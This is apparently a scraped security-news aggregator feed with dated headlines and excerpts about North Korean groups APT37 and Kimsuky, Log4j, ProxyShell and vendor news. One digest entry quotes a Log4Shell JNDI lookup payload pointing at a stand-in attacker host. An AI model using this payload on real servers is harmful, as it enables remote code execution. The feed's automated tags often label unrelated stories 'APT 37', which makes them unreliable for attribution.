What's new around the internet

Last one

Src Date (GMT) Title Description Tags Stories Notes
CVE.webp 2022-04-28 17:15:39 CVE-2022-29412 (direct link) Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Hermit ????? plugin Cloud APT 37
CVE.webp 2022-04-28 17:15:38 CVE-2022-29410 (direct link) Authenticated SQL Injection (SQLi) vulnerability in Mufeng's Hermit ????? plugin Vulnerability Cloud APT 37
Kaspersky.webp 2022-04-26 11:38:17 Nation-state Hackers Target Journalists with Goldbackdoor Malware (direct link) A campaign by APT37 used a sophisticated malware to steal information about sources, which appears to be a successor to Bluelight. Malware Cloud APT 37
itsecurityguru.webp 2022-04-26 10:13:51 North Korea targets journalists with novel malware (direct link) State sponsored hackers operating out of North Korea have been targeting journalists with a novel malware strain, it has been revealed. The group, known as APT37, distributes the malware through a phishing attack originally discovered by NK News, a US news site specialising in covering news and providing research and analysis about North Korea, using […] Malware Cloud APT 37
SecurityAffairs.webp 2022-04-26 08:25:03 North Korea-linked APT37 targets journalists with GOLDBACKDOOR (direct link) North Korea-linked APT37 group is targeting journalists that focus on DPRK with a new piece of malware. North Korea-linked APT37 group (aka Ricochet Chollima) has been spotted targeting journalists focusing on DPRK with a new piece of malware. The campaign was discovered by journalists at NK News, an American news site that focuses on North […] Cloud APT 37
The_Hackers_News.webp 2022-04-26 02:53:07 North Korean Hackers Target Journalists with GOLDBACKDOOR Malware (direct link) A state-backed threat actor with ties to the Democratic People's Republic of Korea (DPRK) has been attributed to a spear-phishing campaign targeting journalists covering the country with the ultimate goal of deploying a backdoor on infected Windows systems. The intrusions, said to be the work of Ricochet Chollima, resulted in the deployment of a novel malware strain called GOLDBACKDOOR, an Malware Threat Cloud APT 37
Volexity.webp 2022-03-22 16:12:11 Storm Cloud on the Horizon: GIMMICK Malware Strikes at macOS (direct link) In late 2021, Volexity discovered an intrusion in an environment monitored as part of its Network Security Monitoring service. Volexity detected a system running frp, otherwise known as fast reverse proxy, and subsequently detected internal port scanning shortly afterward. This traffic was determined to be unauthorized and the system, a MacBook Pro running macOS 11.6 (Big Sur), was isolated for further forensic analysis. Volexity was able to run Surge Collect to acquire system memory (RAM) and select files of interest from the machine for analysis. This led to the discovery of a macOS variant of a malware implant Volexity calls GIMMICK. Volexity has encountered Windows versions of the malware family on several previous occasions. GIMMICK is used in targeted attacks by Storm Cloud, a Chinese espionage threat actor known to attack organizations across Asia. It is a feature-rich, multi-platform malware family that uses public cloud hosting services (such as Google […] Malware Threat Cloud ★★★
Mandiant.webp 2022-03-09 18:00:00 FedRAMP Ready: Mandiant's Latest Designation Supports Public Sector Customers (direct link) In yet another major milestone in its mission to make every organization secure from cyber threats, Mandiant recently announced that it achieved FedRAMP Ready designation for its first evaluated solution, Mandiant Advantage Automated Defense. Achieving readiness at the High impact level, Automated Defense is now available in the FedRAMP Marketplace as a Cloud Service Offering (CSO), allowing federal agencies to take advantage of its accelerated threat detection, prioritization and response capabilities. What is FedRAMP? FedRAMP is a government-wide program that promotes the adoption of Threat Cloud ★★★
Mandiant.webp 2022-02-02 13:00:00 Announcing Mandiant Advantage Attack Surface Management (direct link) Want to jump in now? Get started with Mandiant Advantage Attack Surface Management by creating your free account today! As organizations continue to digitize their business and employees are empowered to leverage these capabilities, it's no wonder security teams struggle to keep track of infrastructure, applications, cloud services and SaaS usage, let alone ensure security policies are adhered to across these environments. The attack surface is dramatically and vastly expanding, and without the proper automation, it is unlikely that security teams will have the visibility, control, and Cloud ★★
kovrr.webp 2022-01-19 00:00:00 What Emerging Cybersecurity Trends Should Enterprises Be Aware Of? As the world becomes more digitally connected, enterprises need to be aware of the growing cybersecurity risks. (direct link)
As the world becomes more digitally connected every year — and with the pandemic further accelerating digital transformation — all types of enterprises need to be aware of the growing cybersecurity risks that come with this shift. In Europe, for example, significant attacks on critical sectors more than doubled in 2020 compared to 2019, according to data from the European Union Agency for Cybersecurity, as reported by CNN. In 2021, the picture arguably became even bleaker around the world, with major ransomware attacks causing disruption to companies in industries ranging from energy to meat processing. In the first six months of 2021 alone, ransomware-related reported activity in the U.S. had a higher total value ($590 million) than all ransomware-related reported suspicious activity in the U.S. in 2020, according to the U.S. Department of Treasury's Financial Crimes Enforcement Network (FinCEN). The total number of suspicious events filed in the first six months of 2021 in the U.S. also exceeded all of what occurred in the country in 2020 by 30%, the agency reports. Yet it's not just ransomware that's wreaking havoc. Enterprises also need to be prepared for cyber threats like denial of service (DoS) attacks, where a flood of network activity can interrupt servers, thereby causing business interruption. Cisco predicts that distributed denial of service (DDoS) attacks (a subset of DoS, which involves using multiple devices to send a flood of traffic, as opposed to just using one device with a DoS attack) globally will roughly "double from 7.9 million in 2018 to 15.4 million by 2023." In addition to preparing for these types of cyberattacks, enterprises will also increasingly need to be aware of and comply with privacy-related regulations. As governments around the world try to bolster their cybersecurity responses, they are passing or at least considering new rules and guidance around how companies need to handle sensitive data and privacy issues.
Amidst this preparation, enterprises also need to recognize that cybersecurity plans aren't foolproof, especially as attacks evolve. That means assets could be at risk even with solid defenses in place. So, enterprises increasingly need to think about not just how to prevent cyber attacks but also consider the dollar-value cost of risk, given that events will inevitably occur. This process, known as cyber risk quantification — a form of financial quantification — helps enterprises think about and discuss cyber risk in definitive business terms. Knowing how much money is at stake and how different cyber events could affect revenue and profit can help businesses prioritize defenses and take mitigating action like securing cyber insurance. In this report, we'll take a closer look at these emerging cybersecurity trends that enterprises should be aware of. Understanding these areas can help organizations potentially improve their risk management, both from a cybersecurity and overall governance standpoint. Evolving Ransomware Risks: While ransomware is not a new type of threat, the scale and intensity of ransomware continue to broaden. Enterprises large and small, across all types of industries, need to be prepared for these cyber attacks. For one, ransomware-as-a-service, "where ransomware variants are licensed to individuals and accomplices to execute attacks," as Reuters explains, has been on the rise. Based on suspicious activity reports, FinCEN identified 68 ransomware variants in the first half of 2021. "The resulting emergence of new attackers has led to increased uncertainty and volatility for companies in responding to attacks due to the lack of information on the growing number of ransomware threat actors," adds Reuters. Part of the problem is also that ransomware attacks aren't just being launched on an ad-hoc basis by individuals. Instead, there's in Ransomware Tool Threat Prediction Cloud ★★★
Pirate.webp 2022-01-14 13:36:57 Ongoing malware campaign exploiting public cloud infrastructure (direct link) An ongoing malware campaign was recently documented by Cisco's Talos group. According to its experts, it exploits public cloud infrastructure such as Amazon's AWS and Microsoft's Azure cloud services. In light of this attack, cybercriminals are now opting for a fully dynamic attack infrastructure in order to evade initial distribution and access detection. The post Ongoing malware campaign exploiting public cloud infrastructure first appeared on UnderNews. Malware Cloud
Anomali.webp 2021-12-15 16:00:00 Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More (direct link) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache, Botnets, China, Espionage, Java, Russia, USB, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021) A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists; LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability; however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap" and "jndi", but this detection method is easily bypassable. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498 Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021) Researchers from the DevOps firm JFrog have found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1 Malware Tool Vulnerability Threat Cloud APT 37 APT 29 APT 15 APT 15 APT 25
Mandiant.webp 2021-12-14 16:00:00 Azure Run Command for Dummies (direct link) In Mandiant's recent blog post, we detailed suspected Russian intrusion activity that targeted managed services providers (MSP) to gain access to their customers' cloud environments. Other companies, such as Microsoft, have observed similarly targeted activity against customers of several cloud and managed service providers. One notable technique from these intrusions is the use of Azure Run Commands to move laterally from managed hypervisors to the MSP customers' underlying virtual machines. This latest blog post comes as a supplementary annex to highlight Azure Run Commands and provide Cloud ★★
The_Hackers_News.webp 2021-12-07 22:33:02 Warning: Yet Another Bitcoin Mining Malware Targeting QNAP NAS Devices (direct link) Network-attached storage (NAS) appliance maker QNAP on Tuesday released a new advisory warning of a cryptocurrency mining malware targeting its devices, urging customers to take preventive steps with immediate effect. "A bitcoin miner has been reported to target QNAP NAS. Once a NAS is infected, CPU usage becomes unusually high where a process named '[oom_reaper]' could occupy around 50% of the Malware Cloud APT 37
Anomali.webp 2021-12-07 16:04:00 Anomali Cyber Watch: Nginx Trojans, BlackByte Ransomware, Android Malware Campaigns, and More (direct link) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Ransomware, Maldocs, E-Commerce, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence New Malware Hides as Legit Nginx Process on E-Commerce Servers (published: December 2, 2021) Researchers at Sansec discovered NginRAT, a new malware variant that has been found on servers in the US, Germany, and France. Put in place to intercept credit card payments, this malware impersonates legitimate nginx processes, which makes it very difficult to detect. NginRAT has shown up on systems that were previously infected with CronRAT, a trojan that schedules processes to run on invalid calendar days. This is used as a persistence technique to ensure that even if a malicious process is killed, the malware has a way to re-infect the system. Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. That way, it will be easier to spot unusual traffic and connections to and from your network to potentially identify malicious activity.
MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Shared Modules - T1129 Tags: NginRAT, CronRAT, Nginx, North America, EU How Phishing Kits Are Enabling A New Legion Of Pro Phishers (published: December 2, 2021) Phishing kits such as XBALTI are seeing increased use against financial institutions. Mixing email with SMS messages, attackers are targeting companies such as Charles Schwab, J.P. Morgan Chase, RBC Royal Bank and Wells Fargo. Victims are targeted and asked to verify account details. The attack is made to appear legitimate by redirecting to the real sites after information has been harvested. Analyst Comment: With financial transactions increasing around this time of year, it is likely that financially themed malspam and phishing emails will be a commonly used tactic. Therefore, it is crucial that your employees are aware of their financial institution's policies regarding electronic communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document with a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Such emails should be avoided and reported to the appropriate personnel. Tags: Phishing, XBATLI Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors (pub Ransomware Malware Tool Vulnerability Threat Cloud APT 37 ★★★★
SecurityAffairs.webp 2021-12-07 15:28:27 Bitcoin Miner [oom_reaper] targets QNAP NAS devices (direct link) Taiwanese vendor QNAP warns customers of ongoing attacks targeting their NAS devices with cryptocurrency miners. Taiwanese vendor QNAP warns customers of threat actors targeting their NAS devices with cryptocurrency miners. Upon compromising the devices, the miner will create a new process named [oom_reaper] that allows threat actors to mine Bitcoin. The above process could occupy […] Threat Cloud APT 37
SecurityWeek.webp 2021-11-30 12:24:19 North Korean Hackers Use New 'Chinotto' Malware to Target Windows, Android Devices (direct link) Kaspersky has analyzed a new espionage campaign conducted by the threat actor named ScarCruft, and the security firm's researchers have uncovered a previously unknown malware that has been used to target Windows and Android devices. Malware Threat Cloud APT 37
Fortinet.webp 2021-11-30 11:24:48 Recent APT37 Activity and Chinotto, a Multi Platform Infostealer (direct link) FortiGuard Labs is aware of reports of recent activity from APT37. APT37 is a nation-state threat actor attributed to North Korea. The latest discovery by researchers at Kaspersky Labs has revealed a sophisticated, targeted attack that utilizes stolen credentials from Facebook and email accounts belonging to an associate of the targeted victim. The victim was socially engineered and compelled into opening RAR-archived attachments purporting to be from the trusted sender that contained a malicious Word document. The Word document is multi-stage in design, and uses a malicious macro to initiate the first stage. The first stage detects the presence of AV software, and if AV is not present will initiate the second stage, which is shellcode that downloads the final third-stage payload. Ultimately, after several months of dwelling undetected on the infected system, the backdoor will then download the multiplatform infostealer, "Chinotto." Windows variants were sent via spearphishing emails and Android variants were sent via smishing texts. What Operating Systems are Affected? Chinotto targets Windows and Android based operating systems. Is This Limited to Targeted Attacks? Yes. How Serious of an Issue is This? Medium. What is APT37? APT37 (also known as GROUP123 and ScarCruft), attributed to North Korean threat actors, has been in operation for several years. During that time, APT37 has been attributed to the Adobe Flash zero-day attack (CVE-2018-4878) that targeted researchers based in South Korea who were performing research on North Korea. APT37 focuses on various organizations with an interest in North Korea. APT37 is famous for exploiting vulnerabilities in the Hangul Word Processor (HWP), which is commonly used in South Korea, especially by those in the government sector.
Analysis suggests that this is a very detailed and sophisticated threat actor with an arsenal of malware and exploits at their disposal that targets various verticals and organizations with specially crafted campaigns. Other vectors besides the Adobe and Hangul vulnerabilities observed were the usage of Microsoft vulnerabilities as well, specifically CVE-2017-0199 (Microsoft Office UAC bypass) and CVE-2015-2545 (Microsoft Office Encapsulated PostScript (EPS)). For further details on the exploitation of HWP documents and campaigns previously analyzed, please refer to our blog here. What is the Status of Coverage? FortiGuard Labs has AV coverage in place for publicly available samples as: VBA/Agent.AAK!tr, W32/PossibleThreat, VBA/Agent.AF3C!tr, W32/Agent.ACDD!tr, PossibleThreat.MU, PossibleThreat.PALLAS.H, W32/FRS.VSNTGF20!tr, W32/Bsymem.MSJ!tr. All network IOCs are blocked by the WebFiltering client. Any Other Suggested Mitigation? Due to the ease of disruption and the potential for damage to daily operations, reputation, and unwanted release of personally identifiable information (PII), etc., it is important to keep all AV and IPS signatures up to date. It is also important to ensure that all known vendor vulnerabilities are addressed and updated to protect from attackers having a foothold within a network. Attackers are well aware of the difficulty of patching, and if it is determined that patching is not feasible at this time, an assessment should be conducted to determine risk. Also, as this campaign was sent via spearphishing and smishing, organizations are encouraged to conduct ongoing training sessions to educate and inform personnel about the latest phishing/spearphishing/smishing attacks. They also need to encourage employees to never open attachments from someone they don't know, and to always treat emails from unrecognized/untrusted senders with caution.
Since it has been reported that various phishing/spearphishing/smishing attacks have been delivered via social engineering distribution mechanisms, it is crucial that end users within an organization be made aware of the various types of attacks being delivered. This can be accomplished through regular training sessions and impromptu tests using predetermined templates by an organization's internal security department. Si Malware Threat Patching Cloud APT 37
SecureList.webp 2021-11-29 10:00:31 ScarCruft surveilling North Korean defectors and human rights activists (direct link) The ScarCruft group (also known as APT37 or Temp.Reaper) is a nation-state sponsored APT actor. Recently, we had an opportunity to perform a deeper investigation on a host compromised by this group. Cloud APT 37
bleepingcomputer.webp 2021-11-29 08:43:29 APT37 targets journalists with Chinotto multi-platform malware (direct link) North Korean state hacking group APT37 targets South Korean journalists, defectors, and human rights activists in watering hole, spear-phishing email, and smishing attacks delivering malware dubbed Chinotto, capable of infecting Windows and Android devices. [...] Malware Cloud APT 37
The_Hackers_News.webp 2021-11-29 05:14:10 New Chinotto Spyware Targets North Korean Defectors, Human Rights Activists (direct link) North Korean defectors, journalists who cover North Korea-related news, and entities in South Korea are being zeroed in on by a nation-state-sponsored advanced persistent threat (APT) as part of a new wave of highly-targeted surveillance attacks. Russian cybersecurity firm Kaspersky attributed the infiltrations to a North Korean hacker group tracked as ScarCruft, also known as APT37, Reaper Threat Cloud APT 37 APT 37
SecurityAffairs.webp 2021-11-19 15:14:40 North Korea-linked TA406 cyberespionage group activity in 2021 (direct link) North Korea-linked TA406 APT group has intensified its attacks in 2021, particularly credential harvesting campaigns. A report published by Proofpoint revealed that the North Korea-linked TA406 APT group (Kimsuky, Thallium, Konni, Black Banshee, Velvet Chollima) has intensified its operations in 2021. The TA406 cyber espionage group was first spotted by Kaspersky researchers in 2013. At the end of October […] Cloud APT 37
2021-11-10 14:11:03 North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets (direct link) By Jung soo An and Asheer Malhotra, with contributions from Kendall McKay. Cisco Talos has observed a new malware campaign operated by the Kimsuky APT group since June 2021. Kimsuky, also known as Thallium and Black Banshee, is a North Korean state-sponsored advanced... [[ This is only the beginning! Please visit the blog for the complete entry ]] Malware Cloud APT 37
Mandiant.webp 2021-11-02 08:01:01 Mandiant Data Science Showcases Latest Security Machine Learning Research at CAMLIS '21 (direct link) The Mandiant Data Science (MDS) team's mission is to develop innovative machine learning solutions that apply Mandiant's unique expertise and threat intelligence at scale for our customers. MDS is involved in many diverse projects delivered as part of the Mandiant Advantage SaaS platform, but we also present and publish cutting-edge research at the intersection of security and machine learning at leading industry and academic conferences. We are proud to announce that our team recently had four talks accepted at the Conference on Applied Machine Learning in Information Security (CAMLIS) Threat Cloud ★★★
Anomali.webp 2021-08-24 17:11:00 Anomali Cyber Watch: ProxyShell Being Exploited to Install Webshells and Ransomware, Neurevt Trojan Targeting Mexican Users, Secret Terrorist Watchlist Exposed, and More (direct link) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT37 (InkySquid), BlueLight, Ransomware, T-Mobile Data Breach, Critical Vulnerabilities, IoT, Kalay, Neurevt, and ProxyShell. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the "anomali cyber watch" tag. Trending Cyber News and Threat Intelligence Microsoft Exchange Servers Still Vulnerable to ProxyShell Exploit (published: August 23, 2021) Despite patches for a collection of vulnerabilities (ProxyShell) discovered in Microsoft Exchange being available in the July 2021 update, researchers discovered nearly 2,000 of these vulnerabilities have recently been compromised to host webshells. These webshells allow attackers to retain backdoor access to compromised servers for further exploitation and lateral movement into the affected organizations. Researchers believe that these attacks may be related to the recent LockFile ransomware attacks. Analyst Comment: Organizations running Microsoft Exchange are strongly encouraged to prioritize updates to prevent ongoing exploitation of these vulnerabilities. In addition, a thorough investigation to discover and remove planted webshells should be undertaken, as the patches will not remove webshells already planted in their environments.
A threat intelligence platform (TIP) such as Anomali ThreatStream can be a valuable tool to assist organizations in ingesting current indicators of compromise (IOCs) and determining whether their Exchange instances have been compromised. MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Web Shell - T1100 | [MITRE ATT&CK] Hidden Files and Directories - T1158 | [MITRE ATT&CK] Source - T1153 Tags: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, Exchange, ProxyShell, backdoor LockFile: Ransomware Uses PetitPotam Exploit to Compromise Windows Domain Controllers (published: August 20, 2021) A new ransomware family, named LockFile by Symantec researchers, has been observed on the network of a US financial organization. The first known instance of this ransomware was July 20, 2021, and activity is ongoing. This ransomware has been seen largely targeting organizations in a wide range of industries across the US and Asia. The initial access vector remains unknown at this time, but the ransomware leverages the incompletely patched PetitPotam vulnerability (CVE-2021-36942) in Microsoft's Exchange Server to pivot to Domain Controllers (DCs), which are then leveraged to deploy ransomware tools to devices that connect to the DC. The attackers appear to remain resident on the network for several Ransomware Malware Tool Vulnerability Threat Patching Cloud APT 37
SecurityAffairs.webp 2021-08-19 06:47:34 NK-linked InkySquid APT leverages IE exploits in recent attacks (lien direct) North Korea-linked InkySquid group leverages two Internet Explorer exploits to deliver a custom implant in attacks aimed at a South Korean online newspaper. Experts from cybersecurity firm Volexity reported that North Korea-linked InkySquid group (aka ScarCruft, APT37, Group123, and Reaper) leverages two Internet Explorer exploits to deliver a custom backdoor in watering hole attacks aimed at the […] Cloud APT 37
The_Hackers_News.webp 2021-08-18 01:33:33 NK Hackers Deploy Browser Exploits on South Korean Sites to Spread Malware (lien direct) A North Korean threat actor has been discovered taking advantage of two exploits in Internet Explorer to infect victims with a custom implant as part of a strategic web compromise (SWC) targeting a South Korean online newspaper. Cybersecurity firm Volexity attributed the attacks to a threat actor it tracks as InkySquid, and more widely known by the monikers ScarCruft and APT37. Daily NK, the Malware Threat Cloud APT 37
Mandiant.webp 2021-08-10 03:38:14 An Intriguing Update to Mandiant Advantage (lien direct) Today Mandiant made a significant announcement in furthering the capabilities of the Mandiant Advantage SaaS platform with the acquisition of an emerging Attack Surface Management (ASM) leader, Intrigue. With this acquisition we also welcome Jonathan Cran and the Intrigue team to the Mandiant family. We are very excited to have Jonathan, a known industry visionary and entrepreneur, join Mandiant as we continue to build out our Advantage capabilities. ASM is quickly emerging, driving value through asset and exposure visibility in the internet-facing attack surface. It fills a gap between asset Cloud ★★★★
Mandiant.webp 2021-06-02 10:00:00 A New Future for FireEye and Mandiant: Accelerating Opportunities (lien direct) With today's announcement of the sale of the FireEye Products business to Symphony Technology Group (STG), we have taken an important step forward to help us better serve our customers and accelerate strategies that are defining the future of cyber security. The transaction will separate FireEye's network, email, endpoint, and cloud security products, and the related security management and orchestration platform, from Mandiant Solutions' controls-agnostic software and services. The result: both organizations will be able to accelerate growth investments, pursue new go-to-market pathways, and Cloud ★★★
InfoSecurityMag.webp 2021-02-11 11:00:00 UN Links North Korea to $281m Crypto Exchange Heist (lien direct) Most funds recovered but attack bears hallmarks of hermit kingdom Cloud APT 37
The_Hackers_News.webp 2021-01-08 01:54:44 ALERT: North Korean hackers targeting South Korea with RokRat Trojan (lien direct) A North Korean hacking group has been found deploying the RokRat Trojan in a new spear-phishing campaign targeting the South Korean government. Attributing the attack to APT37 (aka Starcruft, Ricochet Chollima, or Reaper), Malwarebytes said it identified a malicious document last December that, when opened, executes a macro in memory to install the aforementioned remote access tool (RAT). "The Tool Cloud APT 37
MalwarebytesLabs.webp 2021-01-06 15:14:45 Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat (lien direct) A North Korean threat group has swapped the usual Hangul Office lures for a cleverly packed Office macro. Categories: Social engineering, Threat analysis. Threat Cloud APT 37
bleepingcomputer.webp 2021-01-05 11:55:57 North Korean software supply chain attack targets stock investors (lien direct) North Korean hacking group Thallium aka APT37 has been targeting a private stock investment messenger service in a supply chain attack, as reported this week. [...] Cloud APT 37
kovrr.webp 2020-11-17 00:00:00 CRIMZON™: The Data Behind the Framework. A report that highlights a subset of the empirical validation for the CRIMZON™ framework. (lien direct) Abstract: The CRIMZON™ framework defines the minimal elements needed to provide a view of accumulated cyber risk. For natural catastrophe risk, individual policy exposures can be aggregated within geographic zones. Similarly, cyber exposures can be aggregated using CRIMZON™. Location also holds importance when assessing cyber catastrophe risk; however, two additional elements must be taken into account to properly assess cyber risk accumulation: industry and company size. Insured companies with common characteristics related to location, industry, and entity size tend to be exposed to similar types of cyber events, because these elements also correspond to the technologies or service providers used. Based on an analysis of millions of cyber events in the last 20 years, Kovrr conducted extensive research to serve as the core empirical validation for the CRIMZON framework. Below is a subset of the research, in which a study group of 120 CRIMZON was determined by selecting the CRIMZON with the highest relevance to the cyber insurance market (the research group was compiled according to the criteria detailed in Appendix A). The total number of unique companies in the study group is 20,000, with an average of 152 companies within a CRIMZON and a median of 86 companies. The research criteria focused on companies' location, industry, entity size, and the hosting and mail technologies and service providers used by the companies. The results showed a concentration of technologies and services when grouping by location, and further concentration when adding the additional elements of the CRIMZON, entity size and industry, to the analysis.
The research shows that companies within the same CRIMZON have a tendency to use the same service providers and technologies, and that different compositions of service providers and technologies can be found across CRIMZON. When trying to estimate accumulations of potential losses from cyber, insurance and reinsurance companies face two main challenges: identifying which policies are exposed to the same cyber events, and determining how many policies will be affected at the same time. The former is related to the problem of enumerating all technologies and service providers each insured relies upon; the latter is equivalent to estimating the footprint of a cyber event. Analyzing accumulations by CRIMZON enables risk professionals to make sense of the size and extent of potential losses from cyber without necessarily needing to collect detailed information about technologies and service providers for each insured. The framework is completely agnostic to the line of business, therefore unlocking a full range of possible applications across both silent and affirmative cyber coverages. Among these applications is the development of aggregate models. This research shows it is possible to estimate the two key ingredients needed for the development of industry loss curves, the hazard and the exposure, using the CRIMZON as the atomic unit of aggregation. By identifying the correlation across CRIMZON, an aggregate model can then be developed. Introduction - What are CRIMZON™? The Cyber Risk Accumulation Zones (CRIMZON™) framework defines the minimal elements needed to provide a view of aggregated cyber exposure. Kovrr launched CRIMZON during participation in the fourth cohort of the Lloyd's Lab, the insurance technology accelerator operated by Lloyd's of London. CRIMZON is an open framework created to facilitate better communication across players in the cyber insurance value chain.
The framework allows users to overlay their data pertaining to loss and cyber attack frequency, as well as additional data, onto the CRIMZON for additional insight into risk per zone and to detect correlations between different zones. The framework was created to support efforts toward setting a standard for data collection for cyber risk management. The CRIMZON are composed of the following three elements: Location - country-level worldwide a Vulnerability Studies Cloud ★★★
The_Hackers_News.webp 2020-11-03 03:49:37 New Kimsuky Module Makes North Korean Spyware More Powerful (lien direct) A week after the US government issued an advisory about a "global intelligence gathering mission" operated by North Korean state-sponsored hackers, new findings have emerged about the threat group's spyware capabilities. The APT - dubbed "Kimsuky" (aka Black Banshee or Thallium) and believed to be active as early as 2012 - has been now linked to as many as three hitherto undocumented malware, Threat Cloud APT 37
SecurityAffairs.webp 2020-11-02 16:40:03 North Korea-Linked APT Group Kimsuky spotted using new malware (lien direct) North Korea-linked APT group Kimsuky was recently spotted using a new piece of malware in attacks on government agencies and human rights activists. North Korea-linked cyber espionage group Kimsuky (aka Black Banshee, Thallium, Velvet Chollima) was recently observed using a new malware in attacks aimed at government agencies and human rights activists. The Kimsuky APT […] Malware Cloud APT 37
Pirate.webp 2020-09-15 11:22:27 New vulnerabilities allow Microsoft 365 multi-factor authentication to be bypassed (lien direct) Multi-factor authentication (MFA) has quickly become an indispensable security control for cloud applications during the global Covid-19 pandemic. With the acceleration of remote work, demand for cloud-based applications such as messaging and collaboration platforms has exploded. Cloud
ZDNet.webp 2020-08-18 04:35:04 US Army report says many North Korean hackers operate from abroad (lien direct) US Army says many North Korean hackers are actually located outside the hermit kingdom, in countries like Belarus, China, India, Malaysia, and Russia. Cloud APT 37
Mandiant.webp 2020-07-30 14:00:00 Obscured by Clouds: Insights into Office 365 Attacks and How Mandiant Managed Defense Investigates (lien direct) With Business Email Compromises (BECs) showing no signs of slowing down, it is becoming increasingly important for security analysts to understand Office 365 (O365) breaches and how to properly investigate them. This blog post is for those who have yet to dip their toes into the waters of an O365 BEC, providing a crash course on Microsoft's cloud productivity suite and its assortment of logs and data sources useful to investigators. We'll also go over common attacker tactics we've observed while responding to BECs and provide insight into how Mandiant Managed Defense analysts approach these Cloud ★★★★
WiredThreatLevel.webp 2020-04-29 14:00:00 6 Best Board Games You Can Play With Friends Over Zoom (Video Chat) (lien direct) Don't let the Covid-19 quarantine turn you into a hermit. Video chat with some friends and play a game together. Cloud APT 37
itsecurityguru.webp 2020-01-03 10:40:14 Microsoft helps shutter domains run by North Korean cybergang Thallium (lien direct) A U.S. district court issued an order enabling Microsoft to take over 50 domains used by a North Korea-based cybercrime gang to conduct spear phishing campaigns. Microsoft's Digital Crimes Unit and the Microsoft Threat Intelligence Center took down the domains controlled by a group it named Thallium after researching the malicious actors' activity and filing […] Threat Cloud APT 37
01net.webp 2019-12-31 02:39:43 Microsoft takes down 50 domain names operated by formidable North Korean hackers (lien direct) The Thallium group was using them to infiltrate American, Japanese and South Korean institutions. To do so, Microsoft obtained a court order from the US authorities. Cloud APT 37
SecurityAffairs.webp 2019-12-30 21:57:04 Microsoft sued North Korea-linked Thallium group (lien direct) Microsoft sued Thallium North Korea-linked APT for hacking into its customers’ accounts and networks via spear-phishing attacks. Microsoft sued a North Korea-linked cyber espionage group tracked as Thallium for hacking into its customers’ accounts and networks via spear-phishing attacks. The hackers target Microsoft users impersonating the company, according to a lawsuit unsealed Dec. 27 in […] Cloud APT 37
ZDNet.webp 2019-12-30 21:53:41 Microsoft takes down 50 domains operated by North Korean hackers (lien direct) Microsoft takes control of 50 domains operated by Thallium (APT37), a North Korean cyber-espionage group. Cloud APT 37
bleepingcomputer.webp 2019-12-30 13:01:33 Microsoft Takes North Korean Hacking Group Thallium to Court (lien direct) Microsoft sued a cyber-espionage group with North Korean links tracked as Thallium for breaking into its customers' accounts and networks via spear-phishing attacks with the end goal of stealing sensitive information, as shown by a complaint unsealed on December 27. [...] Cloud APT 37
